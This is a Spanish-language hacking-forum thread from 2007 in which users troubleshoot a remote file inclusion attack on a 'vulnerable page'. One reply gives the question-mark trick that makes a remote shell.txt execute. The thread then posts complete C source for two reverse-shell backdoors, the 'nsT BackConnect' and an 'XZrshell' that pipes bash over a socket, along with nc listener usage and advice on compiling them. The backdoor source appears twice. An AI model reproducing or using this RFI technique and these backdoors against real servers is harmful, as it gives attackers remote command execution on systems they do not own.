elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Problema haciendo un RFI
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Problema haciendo un RFI  (Leído 5,236 veces)
Hacker-SN4K3

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Problema haciendo un RFI
« en: 31 Marzo 2007, 19:03 pm »

Buenas, hacia tiempo que no me pasaba por aquí, pero ya que estoy, me gustaria saber, porqué mi server, al ejecutar la shell en .txt solo me muestra lo que hay dentro del txt. Es decir yo estoy en la pagina vulnerable:
www.paginavul.com/index.php?pagina=http://miserver.com/shell.txt
Y cuando hago eso me muestra el codigo de la shell, no la shell en si. Si la guardo con formato de imagen, me dice que no se puede mostrar porqué está dañada, y no hace su efecto.

Gracias por adelantado,
SN4K3

PD: Si algun mod lee esto, si puede que me canvie el nombre a Zander.
En línea

Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.322


Peace & Love


Ver Perfil WWW
Re: Problema haciendo un RFI
« Respuesta #1 en: 31 Marzo 2007, 23:26 pm »

Quizas no es vulnerable? Como sabes que en verdad es vulnerable?
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
Hacker-SN4K3

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: Problema haciendo un RFI
« Respuesta #2 en: 1 Abril 2007, 00:59 am »

Wow! Gracias por eso, vi un php que mostraba los archivos externos... pero no dejaba de ser un iframe :P
Y ahora, hay alguna manera de hacer un RFI a través de un iframe?
En línea

Pablo Videla


Desconectado Desconectado

Mensajes: 2.274



Ver Perfil WWW
Re: Problema haciendo un RFI
« Respuesta #3 en: 1 Abril 2007, 05:07 am »

te falto esto:

www.paginavul.com/index.php?pagina=http://miserver.com/shell.txt?

el signo de interrogacion para que ejecutara la shell remota, sin el signo de interrogacion al final , la shell remota no se ejecutara... espero que te haya servido esta informacion , bye
En línea

Hacker-SN4K3

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: Problema haciendo un RFI
« Respuesta #4 en: 1 Abril 2007, 12:21 pm »

La verdad que si, muchisimas gracias!
EDIT: Alguien podria compilar este backdoor de conexion inversa? O si ya lo tienen mejor, es el BackConnect. Saludos!

Nota del moderador: Si no sabes compilar 40 lineas de código en C mejor dedícate a otra cosa.

Aquí el code:
Código:
/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
*    client:    nc -lp 9999
*    server: ./backconnect <ip_client> 9999
*********************************
*/

#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>

int main (int argc, char **argv) {
  struct sockaddr_in sock;
  int sd;
  char command[256];
 
  if (argc < 3) {
   printf("%s <host> <port>\n", argv[0]);
   return 1;
  }
 
  close(1);
 
  if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
   perror(argv[0]);
   return 1;
  }
 
  bzero(&sock, sizeof(sock));
 
  sock.sin_family = AF_INET;
  sock.sin_port = htons(atoi(argv[2]));
  inet_aton(argv[1], &sock.sin_addr);
 
  if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
   perror(argv[0]);
   return 1;
  }
 
  close(2);
  dup(sd);
 
  bzero(command, 256);
  while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
   system(command);
   bzero(command, 256);
  }
 
  close(sd);
  return 0;
}
« Última modificación: 3 Abril 2007, 17:28 pm por ANELKAOS » En línea

Hacker-SN4K3

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: Problema haciendo un RFI
« Respuesta #5 en: 1 Abril 2007, 22:30 pm »

Porque no se porque me da errores de que algunas librerias no las encuentra.
En línea

octalh


Desconectado Desconectado

Mensajes: 518


"El sueño de la razón produce monstruos"


Ver Perfil WWW
Re: Problema haciendo un RFI
« Respuesta #6 en: 2 Abril 2007, 07:32 am »

buen backdoor  ;D ;D

aki otro code +
Código:
/* Writed by Rozor !Sub_Level */
/* irc-hispano.org #sub_level ( xZR ) */
/* http://sincontrol.tomahost.org */
/* on C/C++ for Linux*/
/* gcc XZrshell.c -o XZrshell */
/* Name ID = /bin/cat */

   
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>



    int main()
    {
        int sck;
        struct sockaddr_in rhost;
        char *IP = "127.0.0.1"; /* Direccion ip */
        unsigned short PORT = 666; /* Puerto */
       
        rhost.sin_family = AF_INET;
        rhost.sin_port = htons(PORT);
        rhost.sin_addr.s_addr = inet_addr("127.0.0.1");
        memset(&(rhost.sin_zero), '\0', 8);
       
        sck = socket(AF_INET, SOCK_STREAM, 0);
        connect(sck, (struct sockaddr *)&rhost, sizeof(rhost));
     
       if(!fork())
       {

        setsid();
        dup2(sck, 0);
        dup2(sck, 1);
        dup2(sck, 2);       
        dup2(sck, 3);
        dup2(sck, 4);
        dup2(sck, 5);
        execl("/bin/bash", "/bin/cat", NULL);
        close(sck);
     
      }


}

es bastante sencillo pero practiko tambien

bytes
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Problema haciendo un RFI
« Respuesta #7 en: 2 Abril 2007, 12:25 pm »

no te debiera de dar problemas...has buscado si tienes esas librerias??
si es así al compilar incluyelas en la ruta con :   -L <ruta>
si no las tienes, bájatelas y colócalas en las rutas por defecto: /lib o /usr/lib
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
##shadow##

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Problema haciendo un RFI
« Respuesta #8 en: 3 Abril 2007, 19:18 pm »

si, es raro, deberia funcionar, lo unico es que lo estes compilando en windows, las sys/ no te las reconoceria, esas son para linux, en caso de ser asi, usa linux o cygwin :)
En línea

Hacker-SN4K3

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: Problema haciendo un RFI
« Respuesta #9 en: 3 Abril 2007, 22:01 pm »

La verdad que si, muchisimas gracias!
EDIT: Alguien podria compilar este backdoor de conexion inversa? O si ya lo tienen mejor, es el BackConnect. Saludos!

Nota del moderador: Si no sabes compilar 40 lineas de código en C mejor dedícate a otra cosa.

Aquí el code:
Código:
/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
*    client:    nc -lp 9999
*    server: ./backconnect <ip_client> 9999
*********************************
*/

#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>

int main (int argc, char **argv) {
  struct sockaddr_in sock;
  int sd;
  char command[256];
 
  if (argc < 3) {
   printf("%s <host> <port>\n", argv[0]);
   return 1;
  }
 
  close(1);
 
  if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
   perror(argv[0]);
   return 1;
  }
 
  bzero(&sock, sizeof(sock));
 
  sock.sin_family = AF_INET;
  sock.sin_port = htons(atoi(argv[2]));
  inet_aton(argv[1], &sock.sin_addr);
 
  if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
   perror(argv[0]);
   return 1;
  }
 
  close(2);
  dup(sd);
 
  bzero(command, 256);
  while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
   system(command);
   bzero(command, 256);
  }
 
  close(sd);
  return 0;
}

Mira "moderador" yo no se de que conyo vas, pero seguro que tu no naciste defaceando una web, sino que lo aprendistes, y por algo se empieza, así que te tranquilizas OK?
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema haciendo una busqueda y replazo con VB Script
Scripting
Gallusser 3 4,205 Último mensaje 11 Enero 2011, 17:01 pm
por Novlucker
Problema haciendo un hipervínculo en HTML (href)
Desarrollo Web
RevolucionVegana 7 3,308 Último mensaje 1 Enero 2016, 19:35 pm
por RevolucionVegana
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines